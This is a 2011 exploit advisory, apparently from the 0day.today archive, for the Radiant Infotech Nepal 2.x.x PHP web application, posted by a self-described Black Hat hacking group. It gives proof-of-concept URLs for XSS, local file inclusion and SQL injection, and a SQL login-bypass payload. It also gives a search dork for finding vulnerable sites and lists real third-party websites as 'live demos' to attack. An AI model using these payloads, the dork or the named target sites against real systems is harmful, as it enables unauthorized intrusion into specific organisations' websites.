Radiant Infotech Nepal 2.x.x Multiple Vulnerability

2011-06-04T00:00:00
ID 1337DAY-ID-16255
Type zdt
Reporter Net.Edit0r
Modified 2011-06-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [+]Title :.......Radiant Infotech Nepal 2.x.x Multiple Vulnerability
[+]Author :......Net.Edit0r
[+]Tested on :...Linux/PHP
---------------------------------------------------------------------------
[~] Founded by Net.Edit0r
[~] Team: Black Hat Group #BHG
[~] Contact: [email protected]
[~] Home: http://Black-HG.Org
[~] Vendor: http://www.radiantnepal.com/
[~] Category: Web Apps

==========ExPl0iT3d by Net.Edit0r==========

[+] DORK: "Powered by :: Radiant Infotech Nepal Pvt. Ltd"


[ I ].   Multiple Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[+++] Important: The security problem in the directory "Index.php" has
been created.


[P0C]:  http://127.0.0.1/?msg=[Xss]

[P0C]:  http://127.0.0.1/index.php?action=[LFI]

[P0C]:  http://127.0.0.1/index.php?linkId=[SQL]

[P0C]:  http://127.0.0.1/index.php?errMsg=[Xss]

[P0C]:  http://127.0.0.1/index.php?action=loginbox [Login Bypass]

[ I ]. ExploiT Login Bypass
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

user: 'or''='

pass: 'or''='

[L!v3 D3m0s]:

http://www.nepalphd.org/?msg=[Xss]

http://www.nepalphd.org/index.php?action=[LFI]

http://www.nepalphd.org/index.php?linkId=[SQL]

http://www.raptifashiondirect.com/index.php?action=[LFI]

http://www.raptifashiondirect.com/index.php?errMsg=[Xss]

http://www.upamadevelopers.com/index.php?action=loginbox [Login Bypass]

http://www.upamadevelopers.com/index.php?action=[LFI]

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[+] TIME TABLE:

2011-06-01 - Vulnerability discovered.
2011-06-03  - Advisory released.


===========================================================================================
[!] Black Hat Group ./Iranian HackerZ
===========================================================================================
[!] MaiL: [email protected] ~ [email protected]
===========================================================================================
[!] Greetz To : DarkCoder  | 3H34N | Amir-MaGiC | H3x | D3adlY | Cho0bin
===========================================================================================
[!] Spec Th4nks: HUrr!c4nE | B3hz4d | M4Hd1 |Mikili And All My Friendz
===========================================================================================
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
===========================================================================================



#  0day.today [2018-04-14]  #